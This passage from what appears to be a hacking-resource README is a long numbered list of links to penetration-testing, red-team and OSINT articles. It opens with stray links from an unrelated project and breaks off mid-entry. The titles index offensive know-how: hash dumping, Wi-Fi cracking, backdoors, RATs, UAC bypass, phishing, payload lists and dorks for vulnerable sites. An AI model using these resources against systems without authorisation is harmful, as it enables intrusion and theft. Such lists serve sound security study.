https://github.com/starjun/openstar/wiki/2-host_method_Mod [13]: https://github.com/starjun/openstar/wiki/3-rewrite_Mod [14]: https://github.com/starjun/openstar/wiki/4-host_Mod [15]: https://github.com/starjun/openstar/wiki/5-app_Mod [16]: https://github.com/starjun/openstar/wiki/6-referer_Mod [17]: https://github.com/starjun/openstar/wiki/7-uri_Mod [18]: https://github.com/starjun/openstar/wiki/8-header_Mod [19]: https://github.com/starjun/openstar/wiki/9-useragent_Mod [20]: https://github.com/starjun/openstar/wiki/10-cookie_Mod [21]: https://github.com/starjun/openstar/wiki/11-args_Mod [22]: https://github.com/starjun/openstar/wiki/12-post_Mod [23]: https://github.com/starjun/openstar/wiki/13-network_Mod [24]: https://github.com/starjun/openstar/wiki/14-replace_Mod [25]: https://github.com/knownsec/404StarLink-Project/raw/master/logo.png "404.png" [26]: https://github.com/knownsec/404StarLink2.0-Galaxy [27]: ./doc/xq.jpg "xq.jpg"
# PENTESTING-BIBLE # WAYBACK MACHINE FOR HACKING ARTICLES ALL THE SCREENSHOTS IS AS PDF # hundreds of ethical hacking &amp; penetration testing &amp; red team &amp; cyber security &amp; computer science resources. # MORE THAN 2000 LINKS. # MORE THAN 2000 PDF FILES ABOUT DIFFERENT FIELDS OF HACKING . # note:most of the pdf files is different than the links which means there is now almost 4000 links & pdf files. # Created By Ammar Amer (Twitter @cry__pto) ## Support. *Paypal:* [![Donate via Paypal](https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif)](https://paypal.me/AmmarAmerHacker) -1- 3 Ways Extract Password Hashes from NTDS.dit: https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: https://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/ -3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty: www.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/ -4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection: https://medium.com/p/2e143eb36941 -5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality: https://medium.com/p/a11bb5f863b3/share/twitter -6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company: https://medium.com/p/a69afe5a0899 -7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation: https://medium.com/p/b29355a8e68e -9-Recon — my way: https://medium.com/p/82b7e5f62e21 -10-Reconnaissance: a eulogy in three acts: https://medium.com/p/7840824b9ef2 -11-Red-Teaming-Toolkit: https://github.com/infosecn1nja/Red-Teaming-Toolkit -12-Red Team Tips: https://vincentyiu.co.uk/ -13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL: https://modexp.wordpress.com/2019/04/24/glibc-shellcode/ -14-Shellcode: Encrypting traffic: https://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/ -15-Penetration Testing of an FTP Server: https://medium.com/p/19afe538be4b -16-Reverse Engineering of the Anubis Malware — Part 1: https://medium.com/p/741e12f5a6bd -17-Privilege Escalation on Linux with Live examples: https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/ -18-Pentesting Cheatsheets: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -19-Powershell Payload Delivery via DNS using Invoke-PowerCloud: https://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud -20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS: https://sguru.org/ghdb-download-list-4500-google-dorks-free/ -21-SQL Injection Cheat Sheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -22-SQLmap’s os-shell + Backdooring website with Weevely: https://medium.com/p/8cb6dcf17fa4 -23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips: https://medium.com/p/c5a3f5764cb3 -24-Top 10 Essential NMAP Scripts for Web App Hacking: https://medium.com/p/c7829ff5ab7 -25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!: https://medium.com/p/52cf5c5640a1 -26-Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -27-XSS Payloads, getting past alert(1): https://medium.com/p/217ab6c6ead7 -28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical: https://medium.com/p/50d8135b7549 -29-Web Application Firewall (WAF) Evasion Techniques: https://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques -30-OSINT Resources for 2019: https://medium.com/p/b15d55187c3f -31-The OSINT Toolkit: https://medium.com/p/3b9233d1cdf9 -32-OSINT : Chasing Malware + C&C Servers: https://medium.com/p/3c893dc1e8cb -33-OSINT tool for visualizing relationships between domains, IPs and email addresses: https://medium.com/p/94377aa1f20a -34-From OSINT to Internal – Gaining Access from outside the perimeter: https://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter -35-Week in OSINT #2018–35: https://medium.com/p/b2ab1765157b -36-Week in OSINT #2019–14: https://medium.com/p/df83f5b334b4 -37-Instagram OSINT | What A Nice Picture: https://medium.com/p/8f4c7edfbcc6 -38-awesome-osint: https://github.com/jivoi/awesome-osint -39-OSINT_Team_Links: https://github.com/IVMachiavelli/OSINT_Team_Links -40-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -41-Hacking Cryptocurrency Miners with OSINT Techniques: https://medium.com/p/677bbb3e0157 -42-A penetration tester’s guide to sub- domain enumeration: https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5 -43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages: https://blackarch.org/recon.html -44-What tools I use for my recon during BugBounty: https://medium.com/p/ec25f7f12e6d -45-Command and Control – DNS: https://pentestlab.blog/2017/09/06/command-and-control-dns/ -46-Command and Control – WebDAV: https://pentestlab.blog/2017/09/12/command-and-control-webdav/ -47-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -48-Command and Control – Kernel: https://pentestlab.blog/2017/10/02/command-and-control-kernel/ -49-Source code disclosure via exposed .git folder: https://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html -50-Pentesting Cheatsheet: https://hausec.com/pentesting-cheatsheet/ -51-Windows Userland Persistence Fundamentals: https://www.fuzzysecurity.com/tutorials/19.html -52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up: https://medium.com/p/abdc7c269dd5 -53-awesome-bug-bounty: https://github.com/djadmin/awesome-bug-bounty -54-dostoevsky-pentest-notes: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -55-awesome-pentest: https://github.com/enaqx/awesome-pentest -56-awesome-windows-exploitation: https://github.com/enddo/awesome-windows-exploitation -57-awesome-exploit-development: https://github.com/FabioBaroni/awesome-exploit-development -58-BurpSuit + SqlMap = One Love: https://medium.com/p/64451eb7b1e8 -59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat: https://medium.com/p/a5a5d3ffea46 -60-DLL Injection: https://pentestlab.blog/2017/04/04/dll-injection -61-DLL Hijacking: https://pentestlab.blog/2017/03/27/dll-hijacking -62-My Recon Process — DNS Enumeration: https://medium.com/p/d0e288f81a8a -63-Google Dorks for nding Emails, Admin users etc: https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc -64-Google Dorks List 2018: https://medium.com/p/fb70d0cbc94 -65-Hack your own NMAP with a BASH one-liner: https://medium.com/p/758352f9aece -66-UNIX / LINUX CHEAT SHEET: cheatsheetworld.com/programming/unix-linux-cheat-sheet/ -67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -68- information gathering: https://pentestlab.blog/category/information-gathering/ -69-post exploitation: https://pentestlab.blog/category/post-exploitation/ -70-privilege escalation: https://pentestlab.blog/category/privilege-escalation/ -71-red team: https://pentestlab.blog/category/red-team/ -72-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -73-Web Application Penetration Testing Cheat Sheet: https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/ -74-Windows Kernel Exploits: https://pentestlab.blog/2017/04/24/windows-kernel-exploits -75-Windows oneliners to download remote payload and execute arbitrary code: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ -76-Windows-Post-Exploitation: https://github.com/emilyanncr/Windows-Post-Exploitation -77-Windows Post Exploitation Shells and File Transfer with Netcat for Windows: https://medium.com/p/a2ddc3557403 -78-Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html -79-Windows Privilege Escalation Guide: www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -80-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -81-Windows Exploitation Tricks: Abusing the User-Mode Debugger: https://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html -82-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -83- Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking -84-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -85-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -86-Comprehensive Guide to Sqlmap (Target Options): http://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2 -87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE: www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple -88-Comprehensive Guide on Gobuster Tool: https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/ -89-My Top 5 Web Hacking Tools: https://medium.com/p/e15b3c1f21e8 -90-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -91-File System Access on Webserver using Sqlmap: http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap -92-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -93-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd): http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa -95-XSS Payload List - Cross Site Scripting Vulnerability Payload List: https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html -96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection: https://www.notsosecure.com/analyzing-cve-2018-6376/ -97-Exploiting Sql Injection with Nmap and Sqlmap: http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap -98-awesome-malware-analysis: https://github.com/rshipp/awesome-malware-analysis -99-Anatomy of UAC Attacks: https://www.fuzzysecurity.com/tutorials/27.html -100-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -101-5 ways to Banner Grabbing: http://www.hackingarticles.in/5-ways-banner-grabbing -102-6 Ways to Hack PostgresSQL Login: http://www.hackingarticles.in/6-ways-to-hack-postgressql-login -103-6 Ways to Hack SSH Login Password: http://www.hackingarticles.in/6-ways-to-hack-ssh-login-password -104-10 Free Ways to Find Someone’s Email Address: https://medium.com/p/e6f37f5fe10a -105-USING A SCF FILE TO GATHER HASHES: https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes -106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit): http://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit 107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities: http://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities -108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs): https://medium.com/p/ef6542301c65 -109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information: https://gbhackers.com/external-black-box-penetration-testing -110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals: https://gbhackers.com/hacking-tools-list -111-Most Important Considerations with Malware Analysis Cheats And Tools list: https://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list -112-Awesome-Hacking: https://github.com/Hack-with-Github/Awesome-Hacking -113-awesome-threat-intelligence: https://github.com/hslatman/awesome-threat-intelligence -114-awesome-yara: https://github.com/InQuest/awesome-yara -115-Red-Team-Infrastructure-Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki -116-awesome-pentest: https://github.com/enaqx/awesome-pentest -117-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -118-pentest-wiki: https://github.com/nixawk/pentest-wiki -119-awesome-web-security: https://github.com/qazbnm456/awesome-web-security -120-Infosec_Reference: https://github.com/rmusser01/Infosec_Reference -121-awesome-iocs: https://github.com/sroberts/awesome-iocs -122-blackhat-arsenal-tools: https://github.com/toolswatch/blackhat-arsenal-tools -123-awesome-social-engineering: https://github.com/v2-dev/awesome-social-engineering -124-Penetration Testing Framework 0.59: www.vulnerabilityassessment.co.uk/Penetration%20Test.html -125-Penetration Testing Tools Cheat Sheet : https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ -126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool: https://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool -127-Spear Phishing 101: https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html -128-100 ways to discover (part 1): https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/ -129-Comprehensive Guide to SSH Tunnelling: http://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/ -130-Capture VNC Session of Remote PC using SetToolkit: http://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/ -131-Hack Remote PC using PSEXEC Injection in SET Toolkit: http://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/ -132-Denial of Service Attack on Network PC using SET Toolkit: http://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/ -133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit: http://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/ -134-Hack Any Android Phone with DroidJack (Beginner’s Guide): http://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/ -135-HTTP RAT Tutorial for Beginners: http://www.hackingarticles.in/http-rat-tutorial-beginners/ -136-5 ways to Create Permanent Backdoor in Remote PC: http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/ -137-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -138-EMPIRE TIPS AND TRICKS: https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/ -139-CSRF account takeover Explained Automated/Manual: https://medium.com/p/447e4b96485b -140-CSRF Exploitation using XSS: http://www.hackingarticles.in/csrf-exploitation-using-xss -141-Dumping Domain Password Hashes: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ -142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough: https://bneg.io/2017/05/24/empire-post-exploitation/ -143-Dropbox for the Empire: https://bneg.io/2017/05/13/dropbox-for-the-empire/ -144-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION: https://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/ -146-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ -148-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ -149-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ -151-enum4linux Cheat Sheet: https://highon.coffee/blog/enum4linux-cheat-sheet/ -152-enumeration: https://technologyredefine.blogspot.com/2017/11/enumeration.html -153-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -154-Command and Control – WMI: https://pentestlab.blog/2017/11/20/command-and-control-wmi -155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -156-Comprehensive Guide to Nmap Port Status: http://www.hackingarticles.in/comprehensive-guide-nmap-port-status -157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -158-Compromising Jenkins and extracting credentials: https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/ -159-footprinting: https://technologyredefine.blogspot.com/2017/09/footprinting_17.html -160-awesome-industrial-control-system-security: https://github.com/hslatman/awesome-industrial-control-system-security -161-xss-payload-list: https://github.com/ismailtasdelen/xss-payload-list -162-awesome-vehicle-security: https://github.com/jaredthecoder/awesome-vehicle-security -163-awesome-osint: https://github.com/jivoi/awesome-osint -164-awesome-python: https://github.com/vinta/awesome-python -165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit): https://www.exploit-db.com/download/44830.rb -166-nbtscan Cheat Sheet: https://highon.coffee/blog/nbtscan-cheat-sheet/ -167-neat-tricks-to-bypass-csrfprotection: www.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection -168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2: https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/ -169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts): https://medium.com/p/868a7bd7f692 -170-Nmap Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet/ -171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ -172-Phishing with PowerPoint: https://www.blackhillsinfosec.com/phishing-with-powerpoint/ -173-hide-payload-ms-office-document-properties: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/ -174-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -175-How to Build a C2 Infrastructure with Digital Ocean – Part 1: https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/ -176-WordPress Penetration Testing using Symposium Plugin SQL Injection: http://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection -177-Manual SQL Injection Exploitation Step by Step: http://www.hackingarticles.in/manual-sql-injection-exploitation-step-step -178-MSSQL Penetration Testing with Metasploit: http://www.hackingarticles.in/mssql-penetration-testing-metasploit -179-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file -180-MySQL Penetration Testing with Nmap: http://www.hackingarticles.in/mysql-penetration-testing-nmap -181-NetBIOS and SMB Penetration Testing on Windows: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows -182-Network Packet Forensic using Wireshark: http://www.hackingarticles.in/network-packet-forensic-using-wireshark -183-Escape and Evasion Egressing Restricted Networks: https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/ -183-Awesome-Hacking-Resources: https://github.com/vitalysim/Awesome-Hacking-Resources -184-Hidden directories and les as a source of sensitive information about web application: https://medium.com/p/84e5c534e5ad -185-Hiding Registry keys with PSRe ect: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 -186-awesome-cve-poc: https://github.com/qazbnm456/awesome-cve-poc -187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -188-Post Exploitation in Windows using dir Command: http://www.hackingarticles.in/post-exploitation-windows-using-dir-command 189-Web Application Firewall (WAF) Evasion Techniques #2: https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 -190-Forensics Investigation of Remote PC (Part 1): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1 -191-CloudFront Hijacking: https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/ -192-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato: http://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato -194-How to intercept TOR hidden service requests with Burp: https://medium.com/p/6214035963a0 -195-How to Make a Captive Portal of Death: https://medium.com/p/48e82a1d81a/share/twitter -196-How to find any CEO’s email address in minutes: https://medium.com/p/70dcb96e02b0 197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation: https://www.exploit-db.com/download/44630.txt -199-Microsoft Word upload to Stored XSS: https://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/ -200-MobileApp-Pentest-Cheatsheet: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet -201-awesome: https://github.com/sindresorhus/awesome -201-writing arm shellcode: https://azeria-labs.com/writing-arm-shellcode/ -202-debugging with gdb introduction: https://azeria-labs.com/debugging-with-gdb-introduction/ -203-emulate raspberrypi with qemu: https://azeria-labs.com/emulate-raspberry-pi-with-qemu/ -204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method: https://medium.com/p/a5807a9a8056 -205-A Red Teamer's guide to pivoting: https://artkond.com/2017/03/23/pivoting-guide/ -206-Using WebDAV features as a covert channel: https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/ -207-A View of Persistence: https://rastamouse.me/2018/03/a-view-of-persistence/ -208- pupy websocket transport: https://bitrot.sh/post/28-11-2017-pupy-websocket-transport/ -209-Subdomains Enumeration Cheat Sheet: https://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html -210-DNS Reconnaissance – DNSRecon: https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/ -211-Cheatsheets: https://bitrot.sh/cheatsheet -212-Understanding Guide to Nmap Firewall Scan (Part 2): http://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2 -213-Exploit Office 2016 using CVE-2018-0802: https://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html -214-windows-exploit-suggester: https://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html -215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS: https://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html -216-IDS, IPS AND FIREWALL EVASION USING NMAP: https://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html -217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet 218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals: https://gbhackers.com/web-application-security-tools-resources -219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet -220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing: https://gbhackers.com/top-500-important-xss-cheat-sheet -221-USBStealer – Password Hacking Tool For Windows Machine Applications: https://gbhackers.com/pasword-hacking -222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals: https://gbhackers.com/mobile-application-penetration-testing -223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now: https://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now -224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method: https://gbhackers.com/manual-sql-injection-2 -225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers: https://gbhackers.com/email-spoofing-exploiting-open-relay -226-Email Header Analysis – Received Email is Genuine or Spoofed: https://gbhackers.com/email-header-analysis -227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals: https://gbhackers.com/cyber-threat-intelligence-tools -228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool: https://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool -229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -230-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -231-A8-Cross-Site Request Forgery (CSRF): https://gbhackers.com/a8-cross-site-request-forgery-csrf -232-Fully undetectable backdooring PE File: https://haiderm.com/fully-undetectable-backdooring-pe-file/ -233-backdooring exe files: https://haiderm.com/tag/backdooring-exe-files/ -234-From PHP (s)HELL to Powershell Heaven: https://medium.com/p/da40ce840da8 -235-Forensic Investigation of Nmap Scan using Wireshark: http://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark -236-Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki -237-wifi-arsenal: https://github.com/0x90/wifi-arsenal -238-XXE_payloads: https://gist.github.com/staaldraad/01415b990939494879b4 -239-xss_payloads_2016: https://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016 -240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.: https://github.com/alebcay/awesome-shell -241-The goal of this repository is to document the most common techniques to bypass AppLocker.: https://github.com/api0cradle/UltimateAppLockerByPassList -242-A curated list of CTF frameworks, libraries, resources and softwares: https://github.com/apsdehal/awesome-ctf -243-A collection of android security related resources: https://github.com/ashishb/android-security-awesome -244-OSX and iOS related security tools: https://github.com/ashishb/osx-and-ios-security-awesome -245-regexp-security-cheatsheet: https://github.com/attackercan/regexp-security-cheatsheet -246-PowerView-2.0 tips and tricks: https://gist.github.com/HarmJ0y/3328d954607d71362e3c -247-A curated list of awesome awesomeness: https://github.com/bayandin/awesome-awesomeness -248-Android App Security Checklist: https://github.com/b-mueller/android_app_security_checklist -249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat: https://github.com/brannondorsey/wifi-cracking -250-My-Gray-Hacker-Resources: https://github.com/bt3gl/My-Gray-Hacker-Resources -251-A collection of tools developed by other researchers in the Computer Science area to process network traces: https://github.com/caesar0301/awesome-pcaptools -252-A curated list of awesome Hacking tutorials, tools and resources: https://github.com/carpedm20/awesome-hacking -253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.: https://github.com/cn0xroot/RFSec-ToolKit -254-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -255-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -256-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -257-A curated list of awesome forensic analysis tools and resources: https://github.com/cugu/awesome-forensics -258-Open-Redirect-Payloads: https://github.com/cujanovic/Open-Redirect-Payloads -259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook -260-Windows memory hacking library: https://github.com/DarthTon/Blackbone -261-A collective list of public JSON APIs for use in security.: https://github.com/deralexxx/security-apis -262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.: https://github.com/devsecops/awesome-devsecops -263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi: https://github.com/diasdavid/awesome-hacking-spots -264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups: https://github.com/djadmin/awesome-bug-bounty -265-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom: https://github.com/enddo/awesome-windows-exploitation -267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development: https://github.com/FabioBaroni/awesome-exploit-development -268-A curated list of awesome reversing resources: https://github.com/fdivrp/awesome-reversing -269-Git All the Payloads! A collection of web attack payloads: https://github.com/foospidy/payloads -270-GitHub Project Resource List: https://github.com/FuzzySecurity/Resource-List -271-Use your macOS terminal shell to do awesome things.: https://github.com/herrbischoff/awesome-macos-command-line -272-Defeating Windows User Account Control: https://github.com/hfiref0x/UACME -273-Free Security and Hacking eBooks: https://github.com/Hack-with-Github/Free-Security-eBooks -274-Universal Radio Hacker: investigate wireless protocols like a boss: https://github.com/jopohl/urh -275-A curated list of movies every hacker & cyberpunk must watch: https://github.com/k4m4/movies-for-hackers -276-Various public documents, whitepapers and articles about APT campaigns: https://github.com/kbandla/APTnotes -277-A database of common, interesting or useful commands, in one handy referable form: https://github.com/leostat/rtfm -278-A curated list of tools for incident response: https://github.com/meirwah/awesome-incident-response -279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys: https://github.com/meitar/awesome-lockpicking -280-A curated list of static analysis tools, linters and code quality checkers for various programming languages: https://github.com/mre/awesome-static-analysis -281-A Collection of Hacks in 